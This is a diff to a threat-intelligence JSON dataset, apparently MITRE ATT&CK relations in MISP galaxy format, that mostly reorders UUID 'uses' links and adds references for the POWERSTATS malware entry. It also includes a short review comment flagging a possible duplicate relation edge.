"estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -17153,49 +19428,14 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17209,7 +19449,28 @@ "type": "uses" }, { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -17230,14 +19491,28 @@ "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17385,13 +19660,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ @@ -17400,14 +19668,21 @@ "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17441,7 +19716,7 @@ "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -17455,7 +19730,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17503,13 +19778,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -17524,6 +19792,13 @@ ], "type": "uses" }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ @@ -17558,6 +19833,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "54456690-84de-4538-9101-643e26437e09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "b0f13390-cec7-4814-b37c-ccec01887faa", @@ -17572,10 +19854,13 @@ ], "refs": [ "https://attack.mitre.org/software/S0223", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/" + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group" ], "synonyms": [ - "POWERSTATS" + "POWERSTATS", + "Powermud" ] }, "related": [ 
@@ -17586,27 +19871,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -17615,7 +19879,14 @@ "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17628,13 +19899,6 @@ ], "type": "uses" }, - { - "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ 
@@ -17643,70 +19907,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -17719,12 +19920,124 @@ ], "type": "uses" }, + { + "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 
"type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "e8545794-b98c-492b-a5b3-4b5a02682e37", @@ -17761,14 +20074,14 @@ "type": "uses" }, { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "dest-uuid": "76c12fc8-a4eb-45d6-a3b7-e371a7248f69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "76c12fc8-a4eb-45d6-a3b7-e371a7248f69", + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -17843,6 +20156,55 @@ ], "type": "uses" }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ 
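Review bot: 03d7999c… is added to this `related` list in the -17843 hunk while the same uuid also survives as a context line in the -17940 hunk on L844; the old side shows the same pair (one removed in -17857, one kept at -17940), so if no object boundary falls in the unseen lines between -17893 and -17940 this object carries a duplicate edge on both sides and the regeneration preserves it. The hunks do not show the enclosing object's `uuid`, so this is inferred from the surrounding edges rather than confirmed. A de-duplication step in the generator keyed on (`dest-uuid`, `type`) would make the check mechanical; a quick `jq` over the new file comparing `length` with `unique_by(."dest-uuid") | length` for each `related` array would confirm or clear it.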
@@ -17857,34 +20219,6 @@ ], "type": "uses" }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ @@ -17893,21 +20227,7 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17940,20 +20260,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ 
@@ -17961,12 +20267,26 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "d1183cb9-258e-4f2f-8415-50ac8252c49e", @@ -18010,27 +20330,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -18038,13 +20337,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ @@ -18052,13 +20344,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ 
@@ -18066,12 +20351,47 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "705f0783-5f7d-4491-b6b7-9628e6e006d2", @@ -18093,6 +20413,34 @@ ] }, "related": [ + { + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ 
@@ -18107,34 +20455,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ @@ -18143,14 +20463,14 @@ "type": "uses" }, { - "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18191,14 +20511,14 @@ "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -18254,62 +20574,6 @@ ], "type": "uses" }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", "tags": [ 
@@ -18324,12 +20588,68 @@ ], "type": "uses" }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "06d735e7-1db1-4dbe-ab4b-acbe419f902b", @@ -18373,14 +20693,14 @@ "type": "uses" }, { - "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -18420,20 +20740,6 @@ ], "type": "uses" }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ @@ -18448,6 +20754,20 @@ ], "type": "uses" }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ @@ -18463,7 +20783,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18498,14 +20818,14 @@ "type": "uses" }, { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -18519,14 +20839,14 @@ "type": "uses" }, { - "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -18593,27 +20913,6 @@ ] }, "related": [ - { - "dest-uuid": "4e6620ac-c30c-4f6d-918e-fa20cae7c1ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "79eec66a-9bd0-4a3f-ac82-19159e94bd44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ @@ -18621,55 +20920,6 @@ ], "type": "uses" }, - { - "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bd4d32f5-eed4-4018-a649-40b229dd1d69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", - 